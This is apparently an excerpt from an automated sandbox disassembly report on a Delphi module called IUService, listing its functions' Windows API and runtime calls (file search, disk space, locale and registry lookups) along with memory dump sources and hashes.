                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,50120000,50242008), ref: 5000C4AB
                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,50120000,50242008), ref: 5000C4BE
                                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,50120000,50242008), ref: 5000C4D4
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,50120000,50242008), ref: 5000C4E0
                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,50120000), ref: 5000C51C
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 5000C528
                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 5000C54B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                            • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                                                                            • API String ID: 3245196872-3908791685
                                                                                                                                            • Opcode ID: b89c123a30ed1ecf070351e2f3e41b55a218454057482099c22ae11a49ac5007
                                                                                                                                            • Instruction ID: 5d7dfac9b9f2aeec60bfe0aae1cd48dcbb1e4dc617a3dbbec08934bed254d2f5
                                                                                                                                            • Opcode Fuzzy Hash: b89c123a30ed1ecf070351e2f3e41b55a218454057482099c22ae11a49ac5007
                                                                                                                                            • Instruction Fuzzy Hash: 65518371D006589BEB10DBE8DC94EDEB3F8EB44320F8446A5A614E7241E774EE848B90
                                                                                                                                            Function 5001C0CC Relevance: 6.0, APIs: 4, Instructions: 33fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E1
                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E7
                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C10C
                                                                                                                                              • Part of subcall function 5001C048: FileTimeToLocalFileTime.KERNEL32(?), ref: 5001C078
                                                                                                                                              • Part of subcall function 5001C048: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 5001C087
                                                                                                                                              • Part of subcall function 5001C048: @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120 ref: 5001C0BD
                                                                                                                                            • @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C105
                                                                                                                                              • Part of subcall function 5001C140: FindClose.KERNEL32(?,?,5001C10A,00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C14C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileTime$Find$System@System@@Sysutils@Unicode$Array$qqrr20Char$qqrx20CloseClose$qqrr19DateErrorFirstFromLastLocalSearchStringStringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2742389685-0
                                                                                                                                            • Opcode ID: 0e6a76c3268d9445fd7af8d569e44dfda8a80cbea70c39b2be0f1572241ae030
                                                                                                                                            • Instruction ID: b28d0052824deb1cb2ffbfc90362c48fba345adbb55124768b9dcd6cc0dc1853
                                                                                                                                            • Opcode Fuzzy Hash: 0e6a76c3268d9445fd7af8d569e44dfda8a80cbea70c39b2be0f1572241ae030
                                                                                                                                            • Instruction Fuzzy Hash: 1CE02B73B021A0171B155FBC6CC189E61C84B956B03490377FA18EB307D628CC4643D0
                                                                                                                                            Function 5001D4C4 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 5001D4E5
                                                                                                                                            • @System@@_llmul$qqrv.RTL120(?,00000000,?,?,?,?,?,?), ref: 5001D507
                                                                                                                                            • @System@@_llmul$qqrv.RTL120(?,00000000,?,?,?,?,?,?), ref: 5001D521
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@_llmul$qqrv$DiskFreeSpace
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 50643528-0
                                                                                                                                            • Opcode ID: f4eae7a069fc1b4a7a09ee1b588b4b1cdc4b33683fb77737d06db2c0557a1bba
                                                                                                                                            • Instruction ID: 0c4a846b8cec236fdab0fe660197de8149f70c443eb820fd00f8eb9c4a30d1bf
                                                                                                                                            • Opcode Fuzzy Hash: f4eae7a069fc1b4a7a09ee1b588b4b1cdc4b33683fb77737d06db2c0557a1bba
                                                                                                                                            • Instruction Fuzzy Hash: 56111EB5E01609AF9B04CF99C881DEFF7F9FFC8300B54C56AA408E7251E6319A418BA0
                                                                                                                                            Function 5001BB34 Relevance: 4.5, APIs: 3, Instructions: 24fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 5001BB48
                                                                                                                                            • FindClose.KERNEL32(00000000,?,?), ref: 5001BB53
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,?,?), ref: 5001BB6C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$CloseFileFirstMove$qqrpxvpviSystem@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1082176048-0
                                                                                                                                            • Opcode ID: 9d8fc8d053a47d63c99a6f4b7e011e5fc562af016db690a0ecbb1cefa599b471
                                                                                                                                            • Instruction ID: f68efd2bf0167bcec839e993e54c55a87f930c309dd978e39b41fb5caf42e4be
                                                                                                                                            • Opcode Fuzzy Hash: 9d8fc8d053a47d63c99a6f4b7e011e5fc562af016db690a0ecbb1cefa599b471
                                                                                                                                            • Instruction Fuzzy Hash: 8CE0923180858887DB20EEB48CC9ADA739CAB80320F500B52B938C31D0EBB0D99486D1
                                                                                                                                            Function 5000C2EC Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameW.KERNEL32(50120000,?,0000020A), ref: 5000C30A
                                                                                                                                            • @System@LoadResourceModule$qqrpbo.RTL120(50120000,?,0000020A), ref: 5000C313
                                                                                                                                              • Part of subcall function 5000C58C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,50120000,50242008), ref: 5000C5A8
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,50120000,50242008), ref: 5000C5C8
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,50120000,50242008), ref: 5000C5E6
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 5000C604
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 5000C622
                                                                                                                                              • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 5000C66B
                                                                                                                                              • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,5000C8B4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001), ref: 5000C689
                                                                                                                                              • Part of subcall function 5000C58C: RegCloseKey.ADVAPI32(?,5000C6C7,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 5000C6BA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open$FileModuleNameQueryValue$CloseLoadModule$qqrpboResourceSystem@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2494118284-0
                                                                                                                                            • Opcode ID: 497cbbe01210680b9eb75a8a48ad75587f7f44726e523d6886d2e020856a3897
                                                                                                                                            • Instruction ID: 1d1766b6d6bdf7e2d7684c9af6fc5eeb11ad942625cb0d89418ba6028d03f5c9
                                                                                                                                            • Opcode Fuzzy Hash: 497cbbe01210680b9eb75a8a48ad75587f7f44726e523d6886d2e020856a3897
                                                                                                                                            • Instruction Fuzzy Hash: B0E06D71A013508BEB04CFA8D8C1E8633D4AB08624F444A51EC14CF247D370DD1087E1
                                                                                                                                            Function 50022830 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LocalTime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 481472006-0
                                                                                                                                            • Opcode ID: 449684beae46f2d3532cd87c13f45d50b14c143529009afe056ee12052635846
                                                                                                                                            • Instruction ID: 603b05ba210550ab35cb675da7c298ca264b39312a6da9293f8d4f7aa50b5376
                                                                                                                                            • Opcode Fuzzy Hash: 449684beae46f2d3532cd87c13f45d50b14c143529009afe056ee12052635846
                                                                                                                                            • Instruction Fuzzy Hash: 22A012408058A101954027180C0323430409910620FC8474178FC502D1ED1D012081D7
                                                                                                                                            Function 5000F05C Relevance: .0, Instructions: 28COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4a32254a26ec7745de881303c7ac90fb81c22ee6ef5ce8fe5113023a79fea4d0
                                                                                                                                            • Instruction ID: 919b428233cae173511029aa0f2b27a77bfc61ebef004b7e03d13958cfa4ce04
                                                                                                                                            • Opcode Fuzzy Hash: 4a32254a26ec7745de881303c7ac90fb81c22ee6ef5ce8fe5113023a79fea4d0
                                                                                                                                            • Instruction Fuzzy Hash: ACF045A160D3C26ED747AB7898AD993BF284F4312030F84DBD885DF0A7E2905406D736
                                                                                                                                            Function 50035548 Relevance: 102.4, APIs: 68, Instructions: 363COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4dff6d1aff6dbcb5c55c52f9778a04b01edc7b7968e91cb192ddaf45763efcb2
                                                                                                                                            • Instruction ID: 5246c103563c2e39cd0757797e0bd30880b93580db4b712d1ebc8a1cb4ddd487
                                                                                                                                            • Opcode Fuzzy Hash: 4dff6d1aff6dbcb5c55c52f9778a04b01edc7b7968e91cb192ddaf45763efcb2
                                                                                                                                            • Instruction Fuzzy Hash: BAD1A0346055898FCF02EBA4E8D18DDB7B1AF54202F68C752F9049B26AC734DE42DBD2
                                                                                                                                            Function 50029078 Relevance: 77.2, APIs: 38, Strings: 6, Instructions: 212threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002909F
                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290AC
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290C9
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290D4
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290E9
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500290F3
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002910A
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029114
                                                                                                                                            • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029127
                                                                                                                                            • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002913B
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029154
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002915E
                                                                                                                                            • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029171
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002918A
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291A0
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291B5
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291CB
                                                                                                                                            • @Sysutils@GetLocaleChar$qqriib.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291DB
                                                                                                                                              • Part of subcall function 50025BC4: GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,50028D40,00000000,50028F6A,?,?,00000000,00000000), ref: 50025BD7
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291F4
                                                                                                                                              • Part of subcall function 50025B78: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 50025B96
                                                                                                                                              • Part of subcall function 50025B78: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,00000100), ref: 50025BAA
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500291FF
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029214
                                                                                                                                              • Part of subcall function 50025B78: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,00000100), ref: 50025BB5
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 5002921F
                                                                                                                                              • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                                                              • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                                                              • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029229
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029233
                                                                                                                                              • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029248
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029252
                                                                                                                                              • Part of subcall function 5001B4C8: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120(?,00000001,50025F1B,00000000,50025F3D,?,?,?,00000000), ref: 5001B4CE
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029263
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029272
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029287
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 50029291
                                                                                                                                            • @Sysutils@GetLocaleStr$qqriix20System@UnicodeString.RTL120(?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292AA
                                                                                                                                            • @Sysutils@StrToIntDef$qqrx20System@UnicodeStringi.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292B4
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292C5
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292D4
                                                                                                                                            • @System@@UStrCatN$qqrv.RTL120(?,:mm,?,?,?,00000001,00000000,5002933E,?,?,?,?,00000000,00000000), ref: 500292EF
                                                                                                                                            • @System@@UStrCatN$qqrv.RTL120(?,:mm:ss,?,?,?,:mm,?,?,?,00000001,00000000,5002933E), ref: 5002930A
